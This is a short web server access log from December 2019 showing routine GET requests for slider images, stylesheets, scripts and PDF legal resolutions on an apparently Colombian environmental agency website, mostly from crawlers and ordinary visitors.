34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/diciembrecaminatas.png HTTP/1.1" 200 510724
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20RCD.jpg HTTP/1.1" 200 92197
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 200 364746
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20practicas%20sostenibles.jpg HTTP/1.1" 200 142958
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Conpes.jpg HTTP/1.1" 200 55220
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebmusgo.jpg HTTP/1.1" 200 367364
34.253.78.120 - - [08/Dec/2019:04:52:17 -0500] "GET /galeria/nivo-slider/demo/images/Banneranonimos.png HTTP/1.1" 200 109388
34.253.78.120 - - [08/Dec/2019:04:52:17 -0500] "GET /galeria/nivo-slider/demo/images/Bannerserpiente2019.jpg HTTP/1.1" 200 270374
34.253.78.120 - - [08/Dec/2019:04:52:18 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Visor%20Geografico%20Ambiental.jpg HTTP/1.1" 200 204673
34.253.78.120 - - [08/Dec/2019:04:52:18 -0500] "GET /galeria/nivo-slider/demo/images/puntos%20atencion%20BANNER.jpg HTTP/1.1" 200 244208
34.253.78.120 - - [08/Dec/2019:04:52:18 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20tinguas.jpg HTTP/1.1" 200 214878
34.253.78.120 - - [08/Dec/2019:04:52:18 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 200 418238
34.253.78.120 - - [08/Dec/2019:04:52:18 -0500] "GET /galeria/nivo-slider/demo/images/banneragendamiento.jpg HTTP/1.1" 200 116897
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/demo/images/banneriniciativa.jpg HTTP/1.1" 200 200385
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/demo/images/Bannercalculadora.jpg HTTP/1.1" 200 313099
34.253.78.120 - - [08/Dec/2019:04:52:19 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
34.253.78.120 - - [08/Dec/2019:04:52:21 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
34.253.78.120 - - [08/Dec/2019:04:52:21 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
66.249.64.63 - - [08/Dec/2019:04:52:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202001%20AL%202100/RESOLUCION%202050%20DE%202007.pdf HTTP/1.1" 200 422091
216.244.66.195 - - [08/Dec/2019:04:53:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1781.pdf HTTP/1.1" 200 434726
192.168.175.104 - - [08/Dec/2019:04:53:22 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.61 - - [08/Dec/2019:04:53:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6716.pdf HTTP/1.1" 304 -
54.36.148.23 - - [08/Dec/2019:04:53:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/861.tif HTTP/1.1" 200 215484
186.84.21.223 - - [08/Dec/2019:04:53:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.21.223 - - [08/Dec/2019:04:53:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.21.223 - - [08/Dec/2019:04:53:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.61 - - [08/Dec/2019:04:54:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204001%20AL%204100/RESOLUCION%204034%20DE%202007.pdf HTTP/1.1" 200 614759
66.249.64.61 - - [08/Dec/2019:04:54:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202501%20AL%202600/RESOLUCION%202506%20DE%202007.pdf HTTP/1.1" 200 15750
46.229.168.161 - - [08/Dec/2019:04:55:01 -0500] "GET /robots.txt HTTP/1.1" 404 1019
